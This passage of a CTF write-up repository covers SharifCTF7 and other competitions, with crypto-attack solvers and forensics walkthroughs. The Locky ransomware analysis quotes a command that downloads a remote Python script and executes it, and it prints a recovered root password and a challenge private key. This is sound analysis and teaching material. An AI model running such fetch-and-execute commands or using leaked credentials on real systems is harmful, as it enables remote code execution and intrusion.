├── 2016-CodeGate
    └── hello-protector
    │   └── solv.py
├── 2016-SharifCTF7
    ├── Crypto
    │   ├── TPQ
    │   │   └── crypto-TPQ.py
    │   ├── Unterscheide
    │   │   ├── enc.txt
    │   │   └── unterscheide_sol.py
    │   ├── XOR
    │   │   ├── crypto-xor.py
    │   │   └── enc
    │   ├── lobotomized_lsb_oracle
    │   │   └── sol.py
    │   └── lsb_oracle
    │   │   └── sol.py
    ├── Forensics
    │   ├── Bsniff
    │   │   ├── README.md
    │   │   └── bsniff.pcap
    │   ├── Locky
    │   │   ├── README.md
    │   │   ├── decrypter.py
    │   │   ├── privkey.pem
    │   │   ├── publickey.pem
    │   │   └── ransomware.py
    │   ├── pretty_raw
    │   │   ├── flag.png
    │   │   ├── picture.png
    │   │   └── readme.md
    │   ├── pretty_slim
    │   │   ├── README.md
    │   │   ├── flaggggg.png
    │   │   ├── flaggggg_fixed_kgb
    │   │   └── slim fix.zip
    │   ├── strange_pdf
    │   │   ├── readme.md
    │   │   ├── snapshot-1.png
    │   │   └── strange_pdf_fixed.pdf
    │   └── synced
    │   │   ├── README.md
    │   │   ├── capture.png
    │   │   ├── cat this
    │   │   └── recovered pictures.rar
    ├── Misc
    │   ├── Playfake
    │   │   └── playfake.py
    │   ├── camera_model
    │   │   ├── 1538
    │   │   └── README.md
    │   ├── find_login
    │   │   ├── README.md
    │   │   ├── capture1.png
    │   │   ├── capture2.png
    │   │   ├── capture3.png
    │   │   ├── capture4.png
    │   │   └── capture5.png
    │   ├── lesula_isola
    │   │   ├── README.md
    │   │   └── lesula-isola.py
    │   ├── lost_voice
    │   │   ├── README.md
    │   │   └── part2.png
    │   └── what_is_hidden
    │   │   └── README.md
    ├── Pwn
    │   ├── NoMoreBlind
    │   │   ├── pwn_NoMoreBlind_leak_text.py
    │   │   ├── pwn_NoMoreBlind_sol.py
    │   │   └── pwn_NoMoreBlind_text.txt
    │   ├── guess
    │   │   └── sol.py
    │   ├── hippotie
    │   │   └── pwn_hippotie_sol.py
    │   ├── persian
    │   │   ├── pwn_persian_leak_text.py
    │   │   ├── pwn_persian_sol.py
    │   │   └── pwn_persian_text.txt
    │   └── tehran
    │   │   └── pwn_tehran_sol.py
    ├── README.md
    ├── Reverse
    │   ├── catch_me_if_you_can
    │   │   ├── 1.png
    │   │   ├── 2.png
    │   │   ├── 3.png
    │   │   ├── 4.png
    │   │   ├── 5.png
    │   │   ├── 6.png
    │   │   ├── readme.md
    │   │   └── sol.py
    │   ├── getit
    │   │   └── getit-sol.py
    │   ├── nanomites
    │   │   ├── README.md
    │   │   ├── snapshot-1.png
    │   │   ├── snapshot-2.png
    │   │   ├── snapshot-3.png
    │   │   ├── snapshot-4.png
    │   │   └── solve.py
    │   ├── repairme
    │   │   └── readme.md
    │   ├── scrack
    │   │   ├── readme.md
    │   │   └── snapshot.png
    │   ├── snake
    │   │   ├── README.md
    │   │   └── snake.png
    │   └── unloadme
    │   │   ├── README.md
    │   │   ├── capture1.png
    │   │   └── capture2.png
    └── Web
    │   ├── CBPM
    │       ├── 1.png
    │       ├── 2.png
    │       ├── 3.png
    │       └── README.md
    │   ├── Extra Security
    │       └── README.md
    │   ├── Irish Home
    │       └── README.md
    │   └── jareCaptcha
    │       └── README.md
├── 2017-ASIS-CTF-Finals
    └── GSA Main Server
    │   ├── 1.png
    │   └── README.md
├── 2017-BostonKeyParty
    └── memo
    │   ├── README.md
    │   └── sol.py
├── 2017-CSAW
    └── firewall
    │   ├── readme.md
    │   ├── sol.py
    │   └── token.py
├── CNAME
└── README.md


/2016-CodeGate/hello-protector/solv.py:
--------------------------------------------------------------------------------
1 | key = [0x54, 0x36, 0x7E, 0x21, 0x48, 0x0C, 0x67, 0x38, 0x50, 0x60, 0x37, 0x68, 0x59, 0x2D, 0x72, 0x20, 0x13, 0x52, 0x3E, 0x72, 0x0B, 0x54, 0x03, 0x33, 0x41, 0x2A, 0x1F, 0x31, 0x1F, 0x3F, 0x05, 0x39]
2 | hardcode = 'c0nGr47uRaTioN!_Y0u_F0uNd_A_k3y!'
3 | init_key = [chr((ord(char) ^ key[i]) ^ ord(char)) for i, char in enumerate(hardcode)]
4 | flag = [chr(ord(init_key[i-1]) ^ ord(init_key[i])) for i in range(1,len(init_key))]
5 | print "T%s" % ''.join(flag)


--------------------------------------------------------------------------------
/2016-SharifCTF7/Crypto/TPQ/crypto-TPQ.py:
--------------------------------------------------------------------------------
 1 | from fractions import gcd
 2 | def egcd(a, b):
 3 |     if a == 0:
 4 |         return (b, 0, 1)
 5 |     else:
 6 |         g, y, x = egcd(b % a, a)
 7 |         return (g, x - (b // a) * y, y)
 8 | 
 9 | def modinv(a, m):
10 |     g, x, y = egcd(a, m)
11 |     if g != 1:
12 |         raise Exception('modular inverse does not exist')
13 |     else:
14 |         return x % m
15 | 
16 | 
17 | i12=49244030705228180104328368856085797830105072817914068247956604979530434783332078300812225545342159380105880851332436177604771884632376488349692505311358912120289938769757278591459508006976279990306315695146041746752559671324344795850052690634165055409308578040016280468493701548921690185949930518184252656921
18 | i13=7139903812978714933813761760254416297047188569434866595352812926947312306140839243343343608299229879387557690115859259825294572840247231563149811204881186186708356964376153445296529170868932915426635997595862924672936487753739357978724601756944109456827008474109624331061479682938161299388186160617143541058
19 | i14=57895045912229721461876856581857874222040285358422703464759541541223346223224454819421701652613674774634980294165709939632844376333490503024391710978814931491376254405716168995508689599834484213116912574927241214883026026153716621782942996638971872441745311127077633955727447902054918922488499057248785809421
20 | i15=74841545156765335455152955067460568736277082988453514833812007010011393701078171296891570708230859649460076104454032987497084461880652393056928826485300103173427351113154870009061197441282511690323897760177923430724548447789996237645725024714072979255874483112850340081717879462372511072848966103553625058171
21 | i16=58960867406397467805163204361229624571507378665905445577991538540272468389026309669168543702927762564059561868400316674796316900942298046597474158595442402420572203461058895534314432457408576906487249657325743871864542477076949708815367342932099451994969251220533238969912217193298025415140736309089321828219
22 | i23=86032034145111073558645798334176450966681408874738826576986942790142040619152781014886754640829150311110611555779373557460755280445834708784554360220071642551395776770268520372704894128315224879887616504478361286015039512308544400022989036572088356202796911409956821113730786206112468630074110322275699876626
23 | i24=25515609038692316889006380945923530923023687169341777234600908499151191891389335796347862366880485196109481693422470804858679070032193718931367358152905953230245357114207504383885455509680306962480259460665035671599385252047676944685627301657904147794927066976481070088992623336184816286895921388699918946858
24 | i25=5534877009045670690099180191452669949888616209676094855203358263755309910213385674586211368001082484561694852160155732094323173811701790491572059186383675072082513356879042536890665524655102007701444366107461562237554982135091212188734577304570003629897082948787885330032966569807539617906935849714211192100
25 | i26=25644443852987939590276850651630983329351778487571871627253565904595518136551266708062686797696257697858601877630055550889130440863097033437844491758505342771039181331126633112784205030769383580874051746606664862209225858521865835622568605994744041941341473843480377675927352413499489618850222933675362342284
26 | i27=14283352921274027150207808578049886926087863128541086124774535501235614266446882938083537547563156470807049894701190448425606483204098491287232834308777312510343402567665612272955807018966859590767767735430925538438211342340160829768781517771218691802484212318011466094219352270566282972981533061474412060547
27 | i34=66342884308702857378588996537492063854217747645145707136158365229718784201687666888851531440948102094050871354281250199051619191417381982677741845572997946131637674939106795454937454594019013552928314626851631427494350520634898214025782887375014485980045023934361110077550243766696785110511318890290534680528
28 | i35=71420479038463106336131987738421479285793275411242024156170382345145193252353698154393750680643739335529113203090700662061646808071139167204853757057786249992360632058813420499264464903512580686917186028920996970915376301321296836487319459232628793354579634103528663708715260998572417963734920220198556458444
29 | 
30 | 
31 | a=gcd(abs(i12-i13),abs(i14-i15))
32 | b=gcd(abs(i12-i23),abs(i24-i25))
33 | e = 65537
34 | d=modinv(e,(a-1)*(b-1))
35 | flag=pow(i12,d,a*b)
36 | str=""
37 | while flag>0:
38 | 	str=chr(flag%256)+str
39 | 	flag/=256
40 | print str


--------------------------------------------------------------------------------
/2016-SharifCTF7/Crypto/Unterscheide/unterscheide_sol.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | """
 3 | SharifCTF{10ED2D76BCC417D9C48BE67F6790AF70}
 4 | """
 5 | import gmpy2
 6 | from Crypto.Util.number import *
 7 | from Crypto.Cipher import AES
 8 | from fractions import gcd
 9 | 
10 | nn=[]
11 | for i,x in enumerate(map(int,tuple(open('enc.txt', 'r')))):
12 | 	nn.append(x-1-i)
13 | 
14 | q=nn[2]-nn[1]
15 | for i in range(len(nn)):
16 | 	for j in range(i+1,len(nn)):
17 | 		q=gcd(q,abs(nn[j]-nn[i]))
18 | print "q:",q
19 | rand=nn[0]%q
20 | print "rand:",rand
21 | 
22 | f=(q-1)/2
23 | #f=(a-d)(a+d)=a^2-d^2
24 | d=1
25 | while 2*d<10**8:
26 | 	a2=f+d**2
27 | 	if gmpy2.is_square(a2):
28 | 		a=gmpy2.isqrt(a2)
29 | 		break
30 | 	d+=1
31 | print "d:",d
32 | p1,p2=a-d,a+d
33 | print "p1:",p1
34 | print "p2:",p2
35 | 
36 | c=""
37 | for i,x in enumerate(nn):
38 | 	l = (x-rand)/(q*(rand+i))
39 | 	c+= '1' if pow(l,p1*2,q)==1 else '0' 
40 | print c
41 | 
42 | c = hex(int(c, 2))[2:-1].decode("hex")
43 | 
44 | key = long_to_bytes(rand)
45 | IV = key[16:32]
46 | mode = AES.MODE_CBC
47 | aes = AES.new(key[:16], mode, IV=IV)
48 | 
49 | print "flag:", aes.decrypt(c)


--------------------------------------------------------------------------------
/2016-SharifCTF7/Crypto/XOR/crypto-xor.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python3
  2 | 
  3 | # Hint: Flag starts with "SharifCTF{", and ends with "}".
  4 | 
  5 | # from secret import p_small_prime, q_small_prime, r, key, flag
  6 | # flag = flag * r
  7 | 
  8 | # def encrypt(msg, p, q, r, key):
  9 | # 	enc = []
 10 | # 	for i in range(len(msg)):
 11 | # 		enc += 
 12 | # 	return bytes(enc)
 13 | 
 14 | # with open('enc', 'wb') as f:
 15 | # 	f.write(encrypt(flag, p_small_prime, q_small_prime, r, key))
 16 | 
 17 | #
 18 | #r=7
 19 | 
 20 | #!/usr/bin/env python3
 21 | 
 22 | # Hint: Flag starts with "SharifCTF{", and ends with "}".
 23 | 
 24 | 
 25 | def attack(enc,p,q,kl):
 26 | 	if (q**2 - 6*q + 6)<=0:return False
 27 | 	flag="SharifCTF{" + '?'*32 + "}"
 28 | 	xks=[]*kl
 29 | 	for i in range(kl):
 30 | 		xks.append([])
 31 | 	for i,c in enumerate(enc):
 32 | 		xks[(7*i)%kl].append( (i%43,c^(i%p)) )
 33 | 	key=[-1]*kl
 34 | 	for i in range(kl):
 35 | 		k=-1
 36 | 		for f,xk in xks[i]:
 37 | 			if flag[f]!='?':
 38 | 				nk=xk^pow(long(ord(flag[f])),q,q**2 - 6*q + 6)
 39 | 				if k!=-1 and k!=nk:
 40 | 					return False
 41 | 				k=nk
 42 | 			elif k!=-1:
 43 | 				ok=False
 44 | 				for pf in range(48,58)+range(97,103):
 45 | 					if xk^pow(pf,q,q**2 - 6*q + 6)==k:
 46 | 						ok=True
 47 | 						break
 48 | 				if not ok:
 49 | 					return False
 50 | 		if k!=-1:
 51 | 			key[i]=k
 52 | 	print key
 53 | 	return True	
 54 | 
 55 | 
 56 | 	return True
 57 | def isprime(x):
 58 | 	for i in range(2,x):
 59 | 		if x%i==0:return False
 60 | 	return True
 61 | def small_prime(mi,ma):
 62 | 	if mi<2:mi=2
 63 | 	small_prime=[]
 64 | 	for p in range(mi,ma):
 65 | 		if isprime(p):
 66 | 			small_prime.append(p)
 67 | 	return small_prime
 68 | 
 69 | p_list=small_prime(2,400)
 70 | q_list=small_prime(2,500)
 71 | 
 72 | enc=map(ord,open('enc', 'rb').read())
 73 | 
 74 | ############## PHASE 1 ###################
 75 | # for kl in range(2,500):
 76 | # 	for p in p_list:
 77 | # 		for q in q_list:
 78 | # 			if attack(enc,p,q,kl):
 79 | # 				print ">>>>>>>>>",p,q,kl
 80 | 
 81 | ############## PHASE 2 ###################
 82 | 
 83 | r=7
 84 | key=[239L, 84L, 245L, 143L, 95L, 81L, 203L, 177L, 30L, 225L, 241L]
 85 | p=251
 86 | q=19
 87 | flag=[]
 88 | 
 89 | rev={}
 90 | for i in range(48,58)+range(97,103):
 91 | 	x=pow(i,q,q**2 - 6*q + 6)
 92 | 	if x not in rev:
 93 | 		rev[x]=[i]
 94 | 	else:
 95 | 		rev[x].append(i)
 96 | 
 97 | str=""
 98 | for i in range(43):
 99 | 	x=(enc[i] ^ (i%p) ^ key[r*i % len(key)])%(q**2 - 6*q + 6)
100 | 	if x not in rev :
101 | 		str+='?'
102 | 	else:
103 | 		str+=chr(rev[x][0])
104 | print str
105 | 
106 | #SharifCTF{6494889069126bb688b8755815a8d672}


--------------------------------------------------------------------------------
/2016-SharifCTF7/Crypto/XOR/enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/irGeeks/ctf/a942c51a91208b124ceeb8c47d53eebf0d332caf/2016-SharifCTF7/Crypto/XOR/enc


--------------------------------------------------------------------------------
/2016-SharifCTF7/Crypto/lobotomized_lsb_oracle/sol.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | from subprocess import Popen, PIPE
 4 | 
 5 | e = 65537
 6 | n = 94169898764475155086179365872915864925768243050855426387910613522303337327416930459077578555524838413579345103633071500300104580298306187507383687796776619261744561887287065152410825040924957174425131901014950571780211869823508452987101620679856181308669517708916215765377471785309709279780997993371462202127
 7 | c = 84554310261580598058211620872297995265063480196893812976334022270327838015482739129096939702314740821259766144865677921673974339162910708930818463109733348984687023660294660726179053438750361754457786927212462355725758670143043124242928370865662017903815787388480232771504943423128214544949007416507395402507
 8 | k = 1
 9 | lb = 0
10 | ub = n
11 | 
12 | p = Popen(["lobotomized_lsb_oracle.vmp.exe", "/decrypt"], stdout=PIPE, stdin=PIPE)
13 | 
14 | def oracle(c):
15 | 	#print c
16 | 	p.stdout.readline()
17 | 	p.stdin.write(str(c)+"\n")
18 | 	v = p.stdout.readline().strip()
19 | 	#print "oracle", v
20 | 	return int(v)
21 | 
22 | 
23 | while True:
24 | 	o = oracle((pow(2, k*e, n) * c) % n)
25 | 	if k == 848: 
26 | 		if o == 1:
27 | 			ub = (ub + lb) / 2
28 | 		else:
29 | 			lb = (ub + lb) / 2
30 | 	else:
31 | 		if o == 1:
32 | 			lb = (ub + lb) / 2
33 | 		else:
34 | 			ub = (ub + lb) / 2
35 | 			
36 | 	print hex(lb)
37 | 	if lb == ub:
38 | 		break
39 | 	print k
40 | 	k += 1
41 | 	
42 | print k
43 | print hex(lb)
44 | #print hex(lb)[2:-1].decode("hex")
45 | print repr(lb)
46 | print ("0"+hex(lb)[2:-1]).decode("hex")
47 | # brute force last byte :) => e
48 | 


--------------------------------------------------------------------------------
/2016-SharifCTF7/Crypto/lsb_oracle/sol.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | from subprocess import Popen, PIPE
 4 | 
 5 | e = 65537
 6 | n = 120357855677795403326899325832599223460081551820351966764960386843755808156627131345464795713923271678835256422889567749230248389850643801263972231981347496433824450373318688699355320061986161918732508402417281836789242987168090513784426195519707785324458125521673657185406738054328228404365636320530340758959
 7 | c = 2201077887205099886799419505257984908140690335465327695978150425602737431754769971309809434546937184700758848191008699273369652758836177602723960420562062515168299835193154932988833308912059796574355781073624762083196012981428684386588839182461902362533633141657081892129830969230482783192049720588548332813
 8 | k = 1
 9 | lb = 0
10 | ub = n
11 | 
12 | p = Popen(["lsb_oracle.vmp.exe", "/decrypt"], stdout=PIPE, stdin=PIPE)
13 | 
14 | def oracle(c):
15 | 	print c
16 | 	p.stdout.readline()
17 | 	p.stdin.write(str(c)+"\n")
18 | 	v = p.stdout.readline().strip()
19 | 	print "oracle", v
20 | 	return int(v)
21 | 
22 | 
23 | while True:
24 | 	o = oracle((pow(2, k*e, n) * c) % n)
25 | 	if o == 1:
26 | 		lb = (ub + lb) / 2
27 | 	else:
28 | 		ub = (ub + lb) / 2
29 | 	print repr(lb)
30 | 	if lb == ub:
31 | 		break
32 | 	k += 1
33 | print
34 | print ("0"+hex(lb)[2:-1]).decode("hex")
35 | # brute force last byte 
36 | 
37 | 
38 | 


--------------------------------------------------------------------------------
/2016-SharifCTF7/Forensics/Bsniff/README.md:
--------------------------------------------------------------------------------
  1 | #Bsniff
  2 | 
  3 | **Category:** Forensics
  4 | 
  5 | To find the flag, reconstruct what the user was actually looking for.
  6 | 
  7 | ##Solution
  8 | 
  9 | This challenge is more steganography and task is to find the covert-channel.
 10 | For this task we are given a .pcap file which is a captured file of a network traffic that is trying to send flag through
 11 | a hidden channel whithin url requests to blockchain.info website.
 12 | 
 13 | Looking at .pcap file using wireshark, we noticed that there are strange requests to "blockchain.info/q/addressbalance/".
 14 | Looks like some Base64 encoded like data had been transfered through this requests. "Follow tcp stream" on each of these request streams will give us something like below:
 15 | 
 16 | ```
 17 | GET /q/addressbalance/1KBtNgrukDEDiWjrqirzqeiSTL77zLFrVL?confirmations=6 HTTP/1.1
 18 | Host: blockchain.info
 19 | Connection: keep-alive
 20 | Accept-Encoding: gzip, deflate
 21 | Accept: */*
 22 | User-Agent: python-requests/2.4.3 CPython/2.7.9 Linux/3.16.0-4-amd64
 23 | ```
 24 | 
 25 | At first we thought that these data is base64 encoded and a file or something is transfered by this characters. so i tried to put them together to get some file as result, but impossible.
 26 | After wasting a lot of time on finding out how to solve this challenge, By the help of my teammates we noticed that
 27 | some characters are not send throught this urls and There are 41 '?' signs in requests which mean 41 characters are missing.
 28 | 
 29 | complete list of these strings is as below:
 30 | 
 31 | ```
 32 | 1FbACt9mRncgM2JAButUJerYhpQkN9?bcV
 33 | 1AKe3rg4SzdSzR9?nG3wddKkbnstFW3JzU
 34 | 18MDLgXS1mnoiNQ6p17B18Se9z4JDhrz?5
 35 | 1AegmEokZKRCWeMW4vrsgqCvL?1Wf5RNv
 36 | 17eNk?Xo1Kc7KL59H1ndqkXE8USob2dghC
 37 | 15DdBDZ8M32UHDzdbMyJBLLkmowZ?Migt4
 38 | 1CSRjBzRJcFHxS4db8nLiv?Qv4zkBTsxP2
 39 | 1MWn8sPA9UpksgQ73LZeR?35R44DsiUM9v
 40 | 17GJvFgdUsiitxGpMhFphas?Lk3RkZCeQX
 41 | 1JUggm1WKhJvZa1JB?vgr3v5Mf2vnqknT3
 42 | 1D9?ZQftnkN3PcDuPPmE5ML3744puyjgsS
 43 | 18zZiP4UubYh9wjGWmq?nMV7ntnUb3MWGu
 44 | 19?7JpEcHrrkwTTKtXz8ZRAHoKH8vqmxKg
 45 | 1GaUtT9Pd6VC6B?Hudophj2jWf6noc7aFp
 46 | 19MTQ1ujn?zCB6B4ML6YFszpHzwwmHVmEP
 47 | 19MTQ?ujn7zCB6B4ML6YFszpHzwwmHVmEP
 48 | 12ED?tLKFZWZsWCgYEJv6vQMAX1jerhkxD
 49 | 1GBZ?hceFBsexguZEJz4k4cTWSEfKq1fkx
 50 | 1JUggm?WKhJvZa1JB1vgr3v5Mf2vnqknT3
 51 | 1?jzRjqsuhSSA123ABGpX7Tv1QE6vvwJiw
 52 | 1C1?HgHSMu3fURquTaEDaD5BvgTwmD17WU
 53 | 13eN1f?ebMdL6HxTxVyLcuJEtay34meobY
 54 | 16SgUK8nprEuXKD7JgyuPnrhKqN?JynpY9
 55 | 1A71jVtkA?o5D2tDDQvyua6YqDJT7nmWQp
 56 | 1FtuVHgzU8oCkfVRaseApKkb?qSs6hqvDv
 57 | 1Fba7UPrx8hy7n8VS3qJgS3KL4kkPSd?fr
 58 | 15s6yYhzVsrM?9nBi1geaJuBZFGQtMdhA6
 59 | 1jyyFnru16GVAEK9jZfH4Rx2kj?fxvc7Z
 60 | 1?wF9bkpiG6YULrDsC5Z7C1kG3vcR4pP5
 61 | 1KPof64jhmzoDrd18c?g9PmeNv6zPDJ7GM
 62 | 1NXKUBntDYDJMNYoMQcB?FnJQmh66Efw9p
 63 | 155ZkHWajMr8Ueou?8CHT1GRrhEAPdUScZ
 64 | 19caJfenSseY5LVVbN66dGnV4PZwP?ACKV
 65 | 1NWnafub?gAc9FB82o7QXmLEYB2wzEsMWL
 66 | 17GJvFg?UsiitxGpMhFphas3Lk3RkZCeQX
 67 | 126AvtA56BS?SshcdidNqMN9gH2B7AxZLi
 68 | 1LBcGjboLF?nb2xAvxqRxnKfMVuq9jdM8W
 69 | 1JWiY3y46VvJT?Rbg6hzaRDdrcHUxvj2PN
 70 | 1D?1XsL3scgZqCGJfB7Hx5vYNy7Qf9becd
 71 | 1GW83NnA?ZSkMw3XcNA5kSvw55RRcjgWGv
 72 | 1HTKZdD?PCAmjQY18CTDTVFE1rcQpCpDAQ
 73 | ```
 74 | 
 75 | Now the problem was how to find these values.
 76 | But again we noticed that if we send that request again to "blockchain.info/q/addressbalance/", we might get usefull data.
 77 | Cause when the request is not correct we will get responses like "checksum not valid", but if the request is correct it returns an integer value instead.
 78 | So now the task was clear, we should brute these requests to get the right value. Doing this will give us this character sequence:
 79 | 
 80 | ```
 81 | be6ai1ed31a1fb718r18efeFe627Sb2ec5d39dhTC
 82 | ```
 83 | 
 84 | Looking at this string, we noticed that we have all needed characters for SharifCTF which represent the flag. But the position of characters is wrong.
 85 | So i save the occurence position of each character in each url's request of .pcap file. (Again thanks to my teammate for finding out this tricky tip)
 86 | 
 87 | ```python
 88 | {1: '8S', 2: 'fh', 3: 'ae', 4: '8r', 5: 'i1', 6: '1f', 7: 'dC', 8: '5T', 9: '7F', 10: '9', 11: '3', 12: '2', 13: 'd', 14: 'b', 15: 'e', 16: 'e', 17: '1', 18: 'b', 19: '1', 20: '2', 21: 'd', 22: 'e', 23: '3', 24: 'e', 25: 'a', 26: '7', 27: 'e', 28: '1', 29: 'c', 30: 'b', 31: '6', 32: '6'}
 89 | ```
 90 | 
 91 | Now we just have to reorder this values by their position number which will give us the flag.
 92 | 
 93 | Python code to solve this challenge (the dirty one :D)
 94 | 
 95 | ```python
 96 | import pyshark
 97 | import urllib
 98 | import requests
 99 | import itertools
100 | import re
101 | import json
102 | 
103 | chars = '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/'
104 | 
105 | result = {}
106 | outfile = open('all_info.out', 'w')
107 | pkts = pyshark.FileCapture('bsniff.pcap')
108 | count = 0
109 | for pkt in pkts:
110 |     try:
111 |         content = str(pkt.http).split('\n')
112 |     except:
113 |         continue
114 |     for c in content:
115 |         if 'GET /q/addressbalance' in c:
116 |             r = c.split('GET /q/addressbalance/')[1].split('?confirmations=6')[0]
117 |             break
118 |     if r:
119 |         count += 1
120 |         if '?' in r:
121 |             ch = '-'
122 |             req_text = ''
123 |             for xs in itertools.product(chars, repeat=1):
124 |                 n_r = r.replace('?', ''.join(xs))
125 |                 url = 'https://blockchain.info/q/addressbalance/{0}?confirmations=6'.format(n_r)
126 |                 req = requests.get(url)
127 |                 try:
128 |                     int(req.text)
129 |                     break
130 |                 except:
131 |                     continue
132 |             print '{0},{1}'.format(r.index('?'), ''.join(xs))
133 |             result[r.index('?')] = ''.join(xs)
134 | print result
135 | ```


--------------------------------------------------------------------------------
/2016-SharifCTF7/Forensics/Bsniff/bsniff.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/irGeeks/ctf/a942c51a91208b124ceeb8c47d53eebf0d332caf/2016-SharifCTF7/Forensics/Bsniff/bsniff.pcap


--------------------------------------------------------------------------------
/2016-SharifCTF7/Forensics/Locky/README.md:
--------------------------------------------------------------------------------
 1 | By searching the string `locky`, we can get to the Python script (ransomware in Python)
 2 | It generates a 4096 RSA private key and encrypts files using this key in rounds 0-13 (depending on time)
 3 | Encrypted files are saved with .locky extension and public key as .locky_$stamp (see the code) and private key as privkey.pem
 4 | Looking for private key PEM header `BEGIN RSA PRIVATE KEY`, we can get private key from the dump.
 5 | We just need the encrypted file to get the flag. A search for ".locking" will list files that are encrypted: file_1 to file_5.
 6 | The dump contains the result of "ls -la" command which gives us more details. `file_5` with size of 44 can be the flag.
 7 | 
 8 | ```
 9 | root@debian:~/dump# ls -al
10 | total 44
11 | drwx------  3 root root 4096 Nov 30 07:46 .
12 | drwxr-xr-x 22 root root 4096 Aug 24 12:36 ..
13 | -rw-------  1 root root  694 Nov 30 07:43 .bash_history
14 | -rw-r--r—  1 root root  570 Jan 31  2010 .bashrc
15 | drwxr-xr-x  2 root root 4096 Nov 30 05:54 dump
16 | -rw-r--r—  1 root root   21 Nov 30 07:46 file_1
17 | -rw-r--r—  1 root root   21 Nov 30 07:46 file_2
18 | -rw-r--r—  1 root root   21 Nov 30 07:46 file_3
19 | -rw-r--r—  1 root root   21 Nov 30 07:46 file_4
20 | -rw-r--r—  1 root root   44 Nov 30 07:46 file_5
21 | -rw-r--r—  1 root root  140 Nov 19  2007 .profile
22 | ```
23 | 
24 | By running the Python ransomware in the test environment, it is obvious that the final encrypted file size (with 44 bytes as input) is 512 bytes.
25 | We dumped our test process’s memory. Looking at the dump we got, and based on our sample encrypted files, we can see there is a signature before encrypted bytes in memory.
26 | Finding result of one of rounds is enough because max(round) = 13 (see line 26 of code: round = stamp % 14 )
27 | 
28 | That signature was `0002000000000000FFFFFFFFFFFFFFFF00000000` ; searching this in the dump, we select 512 bytes after it (we got 4 files)
29 | Decrypting these files using private key 13 times and saving each round led us to the flag.
30 | 
31 | ```
32 | $ grep -n -r SharifCTF *
33 | 1.bin_11.txt:1:SharifCTF{df90036c153c345dc707d693225f29e3}
34 | ```
35 | 
36 | The stamp is also used in public key filename and available in dump and we can use it but 13 is too small and not important that much
37 | 
38 | 
39 | Search "curl -fsSL"  to see link of Python files downloaded and executed:
40 | ```
41 | root@debian:~/dump# /usr/bin/python -c "$(curl -fsSL https://a.uguu.se/0RLtwwwAqLuw.py)"
42 | ```
43 | —
44 | We also got what seems to be the root password from dump(xD) : Ya@Abbas
45 | 
46 | `WARNING: DO NOT RUN RANSOMWARE.PY ON YOU SYSTEM`


--------------------------------------------------------------------------------
/2016-SharifCTF7/Forensics/Locky/decrypter.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python 
 2 | 
 3 | 
 4 | from Crypto.PublicKey import RSA
 5 | import sys
 6 | rsa = RSA.importKey(open("privkey.pem").read())
 7 | 
 8 | msg = open(sys.argv[1]).read()
 9 | for i in xrange(13):
10 |     msg = rsa.decrypt(msg)
11 |     with open("{}_{}.txt".format(sys.argv[1], i), "wb") as f:
12 |         f.write(msg)
13 | 


--------------------------------------------------------------------------------
/2016-SharifCTF7/Forensics/Locky/privkey.pem:
--------------------------------------------------------------------------------
 1 | -----BEGIN RSA PRIVATE KEY-----
 2 | MIIJKAIBAAKCAgEA3Yohu05z1NgjHl9e0Z/kiEvQzdl8EH+nR47UXFnOQVakQbPx
 3 | 85As0YwtJZwYDkRABgwpWOpIz07jUDF2WjxeNtR84vNL4zT1ylpgNn52+vAwHMz9
 4 | 0CeoGqP9pkTK06w9+HH145D5CEkBGwvpnHmrnTvIaVigb90tXWQg4ag3+RmPSMHy
 5 | xD7ExCogPXIXw/+w0IZ5MXZwRu91EHqYmpt9MnRHsKuJjlOnF9Y5Gn23A9YyTzrr
 6 | n5QEbRvHNCh5ZsPD90csiinwN4pMPgkjyrh5jRAdBsqRBS6lemxuupw+j8lbPGqg
 7 | j+4o/627c08nWei8HwhygCBwV+i4iUrm3dQX4L77CSLwhAwY2aPEDtuLNEtbKG71
 8 | lbvgvBmJzu+O1TEUTi5Be3jxLb6GPibyFeUzQazm83A+1GVHGkkCpNzg2sRqv+DN
 9 | /k3WiHRbc0sH7fnCvQcOQkziZh6RDmLokboRYwBRRMhbpIFewZeakQInwlTgDFpG
10 | nP51Jl1hAoHDLuPbHwIwQzzKf4chabr55kacgwY6nIcYvPWAD5WIsQox5sTnD6i4
11 | 4MQH5GfJ1wnHFhBYRVNlEVAD04QGWl0TNQ9CdW5avi/MDF61Ip5piZyx99C5Rzg4
12 | He1Bf7xe0AgvP4nARE54KjU7EF3GpazCNINh0+bHFOmdhwe7s4AqlYYjzu8CAwEA
13 | AQKCAgBEh8NRfr5EHCwY7CWXsN9v7gwEcX94VxS3BQ7aFonAGn4rOO/iiTnkBHm+
14 | xZ+HYkNv23k64RZu0pdsqjBTT5NRYL/VMK/L9AkIdJaIpOxHSd+IOT1Wk73jp9EC
15 | Cwu3GPP+k7odkC4JCxRFepTka5rTw7eGJv1SPVgYKK4nP/M4olh5iE2BuW0CxYk9
16 | mLqTTdgzWTXKQDoRJ2fOFi54vRqobeHzW8zscyIgNItrj3H6xNrBOZfDwHTyD4K6
17 | tr5/NJW9O44im0CM3cIh+o/Q2On44gAopqbftINJ8Jr8LPMJZZ9MfCt4+pJCLUrs
18 | K5Mfs+flraZFzkMSXpIfHkV2X3KW5wQOpKyPwVKaTYbxZvprX0Xo65uh94txfMos
19 | yVDvGorZM6QSZzEwSdz2Fu7tNcj8Cmu7pBjudY2H7ZWYuNx+e9HLEuL5Sf+WXJ01
20 | CHMvwQa3hFJI3MDiu3tDa0Wpxz/3rKaF/pvjk/5I0NUq60H4nOXch5I4HGSoeBJI
21 | AJbuSNpwvqqE98PXFq9L+Gnr9s8F+Jz45z3Y43vqKs0CTTiSVM0NtjJ2U9ZMIOb8
22 | cmsFiUK30iJw5C4J6IqN/mwZoLStPTcOIhf4TsGiCzFtBCMl4RdpgKdgMrXox2ON
23 | snUQTpO+PL6JeaBpCsOxYs+B19k+Uhlft7I8qcPg2pmZGgN4QQKCAQEA61qSzU2T
24 | rX+cqYUbXneC3MarEvpdqhM4xr/X8k3wjlT7cg7oBEo4UppH8RWqvKVMfU7gJQjf
